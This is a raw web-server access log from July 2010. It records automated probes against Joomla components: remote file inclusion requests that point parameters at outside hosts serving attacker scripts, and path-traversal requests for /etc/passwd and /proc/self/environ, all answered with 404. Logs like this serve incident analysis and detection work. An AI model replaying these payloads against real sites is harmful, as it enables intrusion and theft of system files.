64.15.156.75 - - [27/Jul/2010:14:29:04 +0200] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 336 "-" "Mozilla/5.0"
64.15.156.75 - - [27/Jul/2010:14:29:04 +0200] "GET /logs/access_log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 349 "-" "Mozilla/5.0"
64.15.156.75 - - [27/Jul/2010:14:29:04 +0200] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 331 "-" "Mozilla/5.0"
212.52.166.12 - - [27/Jul/2010:14:30:41 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
217.65.2.151 - - [27/Jul/2010:14:30:56 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.836"
84.217.73.155 - - [27/Jul/2010:14:31:16 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
122.155.9.169 - - [27/Jul/2010:14:31:59 +0200] "GET //export.php?mosConfig_absolute_path=http://qwez.interfree.it/id.jpg?? HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
122.155.9.169 - - [27/Jul/2010:14:32:00 +0200] "GET /logs//export.php?mosConfig_absolute_path=http://qwez.interfree.it/id.jpg?? HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:14:32:07 +0200] "GET /logs/access_log//components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 338 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:14:32:08 +0200] "GET //components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:14:32:08 +0200] "GET /logs//components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 327 "-" "libwww-perl/5.805"
94.23.215.207 - - [27/Jul/2010:14:32:33 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:14:32:33 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:14:32:36 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:14:32:37 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
125.141.91.138 - - [27/Jul/2010:14:32:50 +0200] "GET /logs/access_log//components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 338 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:14:32:58 +0200] "GET /logs//components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 327 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:14:33:52 +0200] "GET /logs/access_log/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
212.52.166.12 - - [27/Jul/2010:14:34:25 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:34:25 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:34:25 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:34:25 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:34:26 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:34:28 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:34:28 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:34:30 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:34:34 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:34:35 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:14:34:41 +0200] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
94.23.215.207 - - [27/Jul/2010:14:34:41 +0200] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
94.23.215.207 - - [27/Jul/2010:14:34:41 +0200] "GET /logs/access_log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 313 "-" "Mozilla/5.0"
121.78.118.123 - - [27/Jul/2010:14:34:49 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:14:34:50 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:14:34:50 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
64.15.156.75 - - [27/Jul/2010:14:35:10 +0200] "GET /logs/access_log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 347 "-" "Mozilla/5.0"
157.181.180.23 - - [27/Jul/2010:14:36:10 +0200] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
157.181.180.23 - - [27/Jul/2010:14:36:10 +0200] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
157.181.180.23 - - [27/Jul/2010:14:36:10 +0200] "GET /logs/access_log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 313 "-" "Mozilla/5.0"
213.229.106.147 - - [27/Jul/2010:14:36:20 +0200] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:14:36:20 +0200] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:14:37:39 +0200] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
110.45.147.240 - - [27/Jul/2010:14:37:45 +0200] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 331 "-" "Mozilla/5.0"
110.45.147.240 - - [27/Jul/2010:14:37:45 +0200] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 336 "-" "Mozilla/5.0"
110.45.147.240 - - [27/Jul/2010:14:37:45 +0200] "GET /logs/access_log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 349 "-" "Mozilla/5.0"
119.192.145.144 - - [27/Jul/2010:14:37:55 +0200] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
157.181.180.23 - - [27/Jul/2010:14:38:01 +0200] "GET /logs/access_log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 315 "-" "Mozilla/5.0"
125.141.91.138 - - [27/Jul/2010:14:38:40 +0200] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
174.142.75.205 - - [27/Jul/2010:14:38:40 +0200] "GET /logs/access_log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 345 "-" "libwww-perl/5.805"
174.142.75.205 - - [27/Jul/2010:14:38:40 +0200] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 329 "-" "libwww-perl/5.805"
174.142.75.205 - - [27/Jul/2010:14:38:41 +0200] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 334 "-" "libwww-perl/5.805"
76.70.7.48 - - [27/Jul/2010:14:38:46 +0200] "GET /logs/access_log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 308 "-" "libwww-perl/5.79"
76.70.7.48 - - [27/Jul/2010:14:38:46 +0200] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.79"
76.70.7.48 - - [27/Jul/2010:14:38:46 +0200] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
72.55.153.180 - - [27/Jul/2010:14:39:22 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:39:22 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:39:22 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:14:41:02 +0200] "GET /logs/access_log//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:14:41:02 +0200] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:14:41:02 +0200] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:14:44:14 +0200] "GET /logs/access_log//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:14:44:14 +0200] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:14:44:15 +0200] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:14:44:42 +0200] "GET /logs/access_log//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:14:44:43 +0200] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:14:44:44 +0200] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
213.145.228.170 - - [27/Jul/2010:14:46:06 +0200] "GET /logs/access_log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:14:46:06 +0200] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:14:46:07 +0200] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
217.65.2.151 - - [27/Jul/2010:14:48:28 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 313 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:48:28 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:48:28 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 302 "-" "libwww-perl/5.836"
110.45.147.240 - - [27/Jul/2010:14:48:47 +0200] "GET /logs/access_log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 347 "-" "Mozilla/5.0"
174.121.240.147 - - [27/Jul/2010:14:51:27 +0200] "GET /logs/access_log//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:14:51:27 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:14:51:27 +0200] "GET /logs//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-" "libwww-perl/5.810"
217.65.2.151 - - [27/Jul/2010:14:55:26 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 313 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:55:26 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:55:27 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 302 "-" "libwww-perl/5.836"
81.21.78.22 - - [27/Jul/2010:14:55:37 +0200] "GET //index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:14:55:44 +0200] "GET //index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:14:56:07 +0200] "GET /logs/access_log//index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:14:56:07 +0200] "GET //index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:14:56:07 +0200] "GET /logs//index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:14:56:09 +0200] "GET /logs/access_log//index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:14:56:09 +0200] "GET //index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:14:56:09 +0200] "GET /logs//index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
157.181.180.23 - - [27/Jul/2010:14:56:25 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
157.181.180.23 - - [27/Jul/2010:14:56:25 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
65.13.185.104 - - [27/Jul/2010:14:57:49 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
84.217.73.155 - - [27/Jul/2010:15:00:07 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:15:00:07 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:15:00:08 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
212.52.166.12 - - [27/Jul/2010:15:07:15 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:07:15 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:07:15 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:07:15 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:07:15 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:07:15 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:15:07:56 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:15:08:01 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:08:22 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:08:23 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:08:23 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:08:24 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:08:24 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:08:24 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:08:31 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:08:32 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:08:32 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:08:33 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:08:34 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:08:34 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:08:44 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:08:44 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:08:45 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:08:47 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:08:47 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-